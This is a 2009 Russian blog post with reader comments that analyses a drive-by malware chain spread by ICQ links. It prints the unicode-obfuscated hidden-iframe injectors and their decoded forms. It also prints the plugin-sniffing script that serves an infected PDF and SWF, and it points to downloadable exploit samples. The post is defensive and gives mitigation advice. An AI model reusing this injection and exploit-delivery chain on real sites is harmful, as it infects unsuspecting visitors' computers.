Новый-старый pdf exploit

    p.s.2: В этом топике вируса нет, хотя „Авасту“ может казаться иначе (спасибо edio)

    Всё началось с невинного сообщения в icq от моей хорошей знакомой:
    31.07.2009 18:45:11 xyz: смотри hxxp://watnhome.com/images/car.gif :)

    Вроде ничего подозрительного. Ну ладно, думаю, зайду. Там рендер BMW какой-то. В общем, довольно приятный. Картинка уже загрузилась, а индикатор загрузки страницы всё не заканчивался… это сработало для меня как тревожный звоночек. Я тут же ткнул Esc, после чего Огнелис остановил загрузку в закладке. С мыслью, что тут надо разобраться, я (с чего-то) решил посмотреть исходный код картинки. По идее, там должна была быть какая-то ерунда, как в любом gif-jpeg изображении, НО! Реальность оказалась горазно интереснее. Итак, смотрим в браузере исходник картинки:
    view-source:hxxp://watnhome.com/images/car.gif

    Ого! Да это же совсем и не картинка ни разу.
    <img src="WorleyVision5.jpg">
    <script type="text/javascript" src="js.js"></script>

    Так-так, интересно, что в яваскрипте?
    Смотрим!
    view-source:hxxp://watnhome.com/images/js.js
    Там оказывается лёгкая ерунда:
    document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006c\u0069\u0073\u0074\u0065\u006e\u007a\u002e\u006f\u0072\u0067\u002f\u0073\u0074\u0061\u0074\u0073\u002f\u0072\u0075\u0031\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')
    Или, переводя в более читабельный вид…
    document.write('<iframe src="hxxp://listenz.org/stats/ru1.php" style="display:none"></iframe>')


    Редирект. Хорошо, не привыкать, идём по цепочке дальше:
    view-source:hxxp://listenz.org/stats/ru1.php
    Ага, привет от того же автора:
    <script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0076\u0065\u0072\u0069\u0076\u0065\u006c\u006c\u002e\u0063\u006f\u006d\u002f\u0075\u0070\u0064\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
    или, чуть более читабельно…
    <script type="text/javascript">document.write('<iframe src="hxxp://verivell.com/upd/index.php" style="display:none"></iframe>')</script>


    Это и есть конец зловредной цепочки:
    view-source:hxxp://verivell.com/upd/index.php
    <script>
    function PDF_SWF_Iframe(sCn)
    {
      document.write(sCn);
    }

    if(navigator.userAgent.indexOf('MSIE') != -1)
    {
      PDF = new Array('AcroPDF.PDF', 'PDF.PdfCtrl');
      for(i in PDF)
      {
        try
        {
          obj = new ActiveXObject(PDF[i]);

          if (obj)
          {
            PDF_SWF_Iframe('<iframe src=evenLike.pdf></iframe>');
          }
        }

        catch(e){}
      }

      try
      {
        obj = new ActiveXObject('ShockwaveFlash.ShockwaveFlash');

        if (obj)
        {
          PDF_SWF_Iframe('<iframe src=normalDummyBelief.swf></iframe>');
        }
      }
      catch(e){}
    }

    else
    {
      for(i = 0; i <= navigator.plugins.length; i++)
      {
        var plugin = navigator.plugins[i].name;

        if((plugin.indexOf('Adobe Acrobat') != -1) || (plugin.indexOf('Adobe PDF') != -1))
        {
          PDF_SWF_Iframe('<iframe src=evenLike.pdf></iframe>');
        }

        if(plugin.indexOf('Flash') != -1)
        {
          PDF_SWF_Iframe('<iframe src=normalDummyBelief.swf></iframe>');
        }
      }
    }
    </script>


    * This source code was highlighted with Source Code Highlighter.

    То есть, добро пожаловать на компьютер pdf (evenLike.pdf — инфицирован Exploit.Win32.Pidief.bfz) и swf, наши самые любимые друзья. Я уже не стал разбирать дальше: эти скрипт и документы эксплуатируют свежую июльскую уязвимость (топик на Хабре), февральскую, а может быть и более старую. Если помните, одно время по сети ходила ссылка на «вирусный ролик» на сайте Альфастраха, который, как оказалось, был вирусным без кавычек, потому что сажал на компьютер пользователя Trojan-Spy.Win32.Zbot.gkj.

    Хотите поиграться? Вы легко можете скачать себе эти документы, и посмотреть, что каждый из них творит. Если этого недостаточно, то есть другой «пример», но автор предупреждает, что ‘This virus is srs business!‘ («этот вирус – нешуточное дело»).

    Так что совместно с сайтом TechBytesDaily я призываю вас отключить показ pdf в окне браузера, как бы удобно это ни казалось. Всегда сохранять pdf документы, и по возможности, пользоваться бесплатыми не столь дырявыми аналогами Адоби Акробата (как Foxit Reader, Sumatra PDF). К сожалению, плагин от Адоби не фильтрует достаточным образом получаемый контент перед тем, как отдать показать его пользователю в браузере.

    И ещё раз о безопасности: будьте внимательны к непонятным сообщениям даже от хорошо знакомых людей, особенно если в нём есть ссылка на неизвестный ресурс и нет личного комментария от автора.

    p.s. В ссылках http на hxxp исправлено мной специально.

    Similar posts

    AdBlock has stolen the banner, but banners are not teeth — they will be back

    More
    Ads

    Comments 83

      +1
      Спасибо. Взято на заметку.
        +8
        >Вроде ничего подозрительного.
        Хорошая шутка. ))
          0
          а что. нормальное сообщение. да и ссылка не сильно подозрительная. да и не с левого контакта.
          я бы тоже открыл.
            0
            а я даже открывал…
            Приходило от одной знакомой…
              0
              это достаточно распространенный способ и используется помоему давно, у знакомой просто либо угнали аську, либо какойто вирусняк с её компа и отправляет это по списку контактов. Своим вроде всегда доверяешь, но не все так просто.
                0
                да я понимаю но обычно они сильнее палятся) типа вот вчера было «клевый тест! прикольнись http:...» ))
                тут уж понятно все…
            0
            для анализа вредоносных и просто обфусцированных Javascript кодов отлично подходит замечательный инструмент Malzilla :)

            в Информационную безопасность переместите что ли
              0
              Спасибо, так и сделаю.
              +13
              У меня этот топик Avast забаннил…
                +1
                Экий Аваст подозрительный! Ему, конечно, за это плюс за такую внимательность, но это уже немного перебор :)
                  0
                  а почему у меня не забанил? 0_о
                    +1
                    Avast вообще местами невменяемый.
                    +1
                    буквально вчера такое приходил, причём с аськи знакомой, правда её номер уже давно спёрли и слали это не первый раз, не сказал бы что я параноик, но для меня это выглядит подозрительно, потому даже в первый раз это дело прошло через «cygwin -> wget», да… извращение, но зато видно что действительно там :))
                      0
                      На самом деле чтобы отправить такое сообщение не обязательно тырить аську :)
                        0
                        Lynx в руки
                        –1
                        Adobe? Решето!
                        И они еще смеют подавать в суд и сажать людей?
                        Да их самих засудить надо! Вот уроды, а?
                          –27
                          Еще и минусуют, суки!
                            +17
                            Угу, угу, сколько адобовцев на хабре то!
                          0
                          Маленький вопрос, если сейчас зайти по ссылке, то я заражусь трояном?
                            +3
                            По какой из трёх?..

                            Вероятно, нет, т.к. последняя в цепочке страница пропала, но я бы рисковать на вашем месте не стал. Если хотите, берите с milw0rm (ссылка на „другой «пример»“) UU encoded код вируса, декодируйте и заражайтесь.
                            –5
                            Слушайте, а нафига вы устанавливаете в браузер плагин pdf? И неужели кто-то пользуется унылым адобовским просмотрщиком?

                            Вот кстати еще один аргумент за отключение JS + Flash на незнакомых сайтах :)
                              +3
                              вы не поверите, но «обычные» люди называют pdf документ просто акробатом.
                              Так как у всех крупных контор он стоит на рабочих машинах по умолчанию.
                                0
                                вообще-то, PDF читалка уже довольно давно называется просто Adobe Reader, а не Acrobat
                                  0
                                  это мы с Вами знаем как читалка называется. А я работаю в крупном проектном институте, где уровень IT-осведомленности средний по больнице. Вот у нас людям даже в голову не приходит, что pdf можно открыть чем-то другим нежели «акробатом».
                                    –6
                                    Извините за банальность, но даже я, айтишник, не особо знаю чем еще можно удобно просмотреть pdf документ :-)))
                                      +2
                                      как правило FoxIt Reader
                                        +1
                                          +2
                                          к сожалению, некорректно работает с русскими символами в полях ввода — анкету на загранпаспорт в нем не заполнишь.
                                          +6
                                          приехали.
                                            +2
                                            так а что странного, в комплекте с любой материнкой идет Ридер/Акробат, по дефолту ставится и юзается. Функцию он свою исполняет, зачем искать замены? У вас есть лишнее время искать замену программам которые используете несколько раз в месяц? У меня нету.

                                            Вон выше дали линки, гляну, просвещусь наконец-то.
                                              +1
                                              ваша позиция понятна, но сами же написали — айтишник.
                                                –1
                                                Мне казалось, что мало кто ставит ВСЁ, что предлагает производитель материнки на диске…
                                                Мне вообще в голову не приходит ставить все подряд. Да и дисков от моего железа давно уже не видел — там все под ХР, которой у меня уже нет. Разве что от ноута, да и то кропотливо выбирается только нужное. Даже при установке банального винампа, от которого давно отказался, снимал все лишние галки с функциями, которыми не пользуюсь.
                                              0
                                              Evince для pdf/ps
                                      +2
                                      по умолчанию для всех сайтов (кроме тех которым доверяю) отключен Flash в Opera, надеюсь это меня спасло бы :-)
                                        +1
                                        Буквально вчера ночью пришла эта же самая ссылка от одного знакомого, к счастью, побоялся открывать.
                                        Спасибо за статью!
                                          +2
                                          От многих людей по аське приходят такие ссылки на картинки, запарило, ей богу.
                                          И ведь не объяснишь человеку, что у него на компьютере зоопарк, не верит, у меня, говорит, самый свежий касперский!

                                          Последнее время тупо закрываю окно с сообщением от таких людей. Надоело.
                                            0
                                            На самом деле это дыра какая-то… Те люди от имени которых производится рассылка не имеют к этому никакого отношения. Мне такие сообщения приходили от товарища когда у него был выключен комп. Причем он пароль каждый день менял, думая что пароль сперли, и каждую ночь по новому сообщению приходило.
                                            В конце концов мы решили что это дыра которая позволяет посылать сообщения якобы от имени пользователя.
                                              0
                                              На самом комп дыра.
                                              Ваш товарищ логинится в асю — пароль отправляется. Спам бот копается в отчетах, видит последние обновления, подключается и шлёт от его имени. Поменять пароль на другом компе и переустановить ОС на зараженном, вот всё решение.
                                              Был бы icq номерок красивый, врятли спамили. Просто бы пароль поменяли и продали :)
                                                0
                                                100% утверждать не стану, вроде от моего имени сообшения не расходились (надеюсь)
                                                Но сообщения «от товарища» приходили ночью когда у него комп был выключен (вроде бы)…
                                                Теперь я сам уже не уверен. :)
                                                  0
                                                  У меня такая проблема была, сообщение отправлялось не всему контакт листу, а только некоторым пользователям, не зависимо в сети они или нет. Отправка происходила в момент запуска клиента (qip). На поиске проблемы не заморачивался, пере установка системы исправила проблему. Было это года полтора назад…
                                            +1
                                            Приходила эта картинка в аську от знакомой дня два назад. Я еще тогда открыл и удивился «что за хрень, ничем не примечательная картинка». Хорошо что ничего не произошло.
                                              +2
                                              Мне эта ссылка тоже дня три-четыре назад от знакомого пришла. Самое интересное — мало того, что этот знакомый не мог быть on-line (был поздний вечер, а пришло с его рабочей аськи), так мы еще вместе перед моим компом сидели. Он сначала аж дар речи потерял.
                                                0
                                                Подтверждаю. Это происходит «само по себе». Ни товарищ, ни его комп для этого не нужен.
                                                  0
                                                  Дайте угадаю? QIP? Вирус на серверах?
                                                    0
                                                    Не угадали. Это украденный пароль от аськи.
                                                      0
                                                      Не похоже. Ни товарищ, ни я QIP не пользовали никогда.
                                                      На краденный пароль тоже не похоже… Как я уже тут писал, он пароль каждый день менял, но каждую ночь «от него» приходило сообщение.
                                                +1
                                                Спасибо за подробную информацию о зловреде. Мне как-то страшновато по таким ссылкам ходить (уже не первая, и, к сожалению, не последняя), поэтому тупо баню.
                                                  +1
                                                  Странно, они вроде еще 31 июля выпустили обновление безопасности (APSB09-10), которые должны были закрыть эти очень удобные уязвимости.

                                                  Какая у Вас версия Reader'a?
                                                    –2
                                                    Спасибо, никакого «Ридера» у меня нет. Только Огнелис, надстройка Flashblock и флэш-модуль от Адоби.
                                                      0
                                                      Хорошо, тогда какая версия у флэш-модуля?
                                                      Мне просто интересно, та ли это уязвимость или что-то другое.
                                                        –1
                                                        Извините, не указал версию модуля: Shockwave Flash 9.0 r124
                                                          0
                                                          Ну вот, версии Adobe Flash Player 9.0.159.0 и 10.0.22.87 (или более ранние) имеют данную уязвимость. О ней даже на Хабре новость проскакивала. Обновления доступны и надо обновиться.

                                                          www.adobe.com/support/security/bulletins/apsb09-10.html
                                                    0
                                                    Согласен с призывом отключить просмотр pdf в браузере. Сейчас захотел сделать это с Chrome, но оказался в затруднительном положении — у хрома нет отключалки плагинов\дополнений. Однако решение таки нашёл.
                                                    Итак, если у вас Хром и Acrobat Reader, что бы отключить просмотр pdf в браузере, надо найти и удалить все nppdf32.dll (отвечают за отображение pdf во всех браузерах).
                                                      0
                                                      а я открыл. KAV 7 тут же заорал. печально :(
                                                        0
                                                        Да, это печально когда антивирусы блокируют вирусы.
                                                        0
                                                        Avast тоже выругался
                                                          0
                                                          Ха прикольно… Мне тоже такое пришло…
                                                            0
                                                            Да, еще бы неплохо было убрать ссылку
                                                              0
                                                              Ссылка изменена так, чтобы нельзя было на неё случайно кликнуть и попасть на вирусный сайт. Также не индексируется как ссылка.

                                                              Если есть желание зайти на сайт, который подробно раписан как источник вирусной заразы – наздоровье!
                                                            0
                                                            открыл в файрфоксе. Nоscript, естественно, такое не пропустил.
                                                              –1
                                                              Что то я не понял, а Nod-у посрать обычная БМВ ^_^, блин запускаю сканилку
                                                                0
                                                                У меня ESET Smart Security сразу заблокировал.
                                                                  0
                                                                  Может потому что обычный NOD 3 трафик не контролирует
                                                                +7
                                                                а Убунту специально не хочет заражаться или она понимает, что мне больше нравятся мерседесы? :)
                                                                  0
                                                                  Не такие изнеженные машинки не для Убунту. Ей какой-то брутальный Лэнд Ровер Дифендер подавай или Ниву Патриот на худой конец.
                                                                  +2
                                                                  можно ещё обезопасить пользователей ваших сайтов, добавив в конфиг apache

                                                                  ForceType application/octet-stream
                                                                  Header set Content-Disposition attachment

                                                                  после этого файлы pdf не будут открываться в броузере, но будут загружаться на ПК

                                                                    +1
                                                                    парсилка коментов срезала директиву FilesMatch для pdf

                                                                    FilesMatch "\.(?i:pdf)$"
                                                                    0
                                                                    Хм, а у меня Касперский ругнулся.
                                                                      0
                                                                      В смысле когда подобную картинку грузил из аськи.
                                                                      –2
                                                                      А у меня фаерволик все подозрительное блочит либо я ему помогаю, и всякую такую ерунду просто не открываю, вот…
                                                                        0
                                                                        adobe уже выпустил patch, update
                                                                          0
                                                                          Судя по странице www.adobe.com/support/downloads/product.jsp?product=10&platform=Windows,
                                                                          свежее (31.07.09) исправление 9.13 требуется только 9-й версии Reader'а.
                                                                          Большая проблема с Adobe Acrobat, масса людей ставят его себе бесцельно, не зная, что pdf-ы давно и успешно можно делать бесплатно при помощи того же pdfcreator'а. Acrobat перехватывает на себя управление pdf, обновлений к нему юзеры не ставят, зная о том, что версия пиратская. Обновления, якобы, не будут устанавливаться? Вот и остается дыра в системе.
                                                                          А Flash Player, кажется, раньше умел сам себя обновлять, сейчас это не так?
                                                                            0
                                                                            у меня тоже стоит старая версия, но для веба скачал ридер с обновлениями. против этого вируса уже вышли обновления адоба, флэш плеера и виндос, надо все ставить.
                                                                          +1
                                                                          Вот на лайфхакере сравнили 5 пдф-ридеров: lifehacker.com/5328211/five-best-pdf-readers
                                                                          Я бы давно перешел на что-то более легкое чем акробат, но в нем лучше всего рендерился текст. Однако в свете последних эксплойтов поставлю быстрый альтернативный просмотрщик по умолчанию, а если надо будет что-то побольше почитать то открою в акробате.
                                                                          • UFO just landed and posted this here
                                                                              +1
                                                                              мм… вот по этому вошло в привычку спрашивать на посланный линк «Что там?», ибо часто сталкивался с подобным, с контакта неважно в ирке, скайпе, аське, во время разговора приходил линк… о котором собеседник и неподозревал… и сам по началу открывал, даже бывало такое друг другу кидали линки на фотки и тут бац такой линк… теперь и спрашиваю… если собеседник ответит что подобное на: " ты о чем?" сразу ясно что там…
                                                                                0
                                                                                Спасибо тебе, автор! Только что пришло подобное же сообщение от хорошей знакомой…
                                                                                  0
                                                                                  мне вчера точно такое же приходило. Безбоязненно открываю такие ссылки т.к. стоит Noscript.
                                                                                  Покопался в коде страницы. По смотрел что куда делается, закрыл страницы и сообщил падруге что у нее на компе зоопарк.
                                                                                    0
                                                                                    А я вот кликнул. Первый раз в жизни. Отвлекся и кликнул :(

                                                                                    ESET Smart Security 4 промолчал. Выскочило окошко а-ля «Adobe лицензионное соглашение». Т.к. сейчас я как раз переустанавливаю систему, то также автоматически нажал Acept. Выскочило что-то, похоже на обновление Адоба. Отказался.

                                                                                    Теперь в раздумьях: словил я нечто на свежеустановленный Windows 7 64-bit или нет. Smart Security проверяет, но вряд ли что-то найдет.
                                                                                      0
                                                                                      а не подскажите как такой javascript декодировать?
                                                                                      а то порылся в интернете, так и не понял как это называется правильно
                                                                                        +1
                                                                                        unescape('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020...')
                                                                                          +1
                                                                                          Прошу прощения, отправилось не туда… Это в одвет на предыдущий комментарий («как такой javascript декодировать?»).
                                                                                            0
                                                                                            спасибо!

                                                                                        Only users with full accounts can post comments. Log in, please.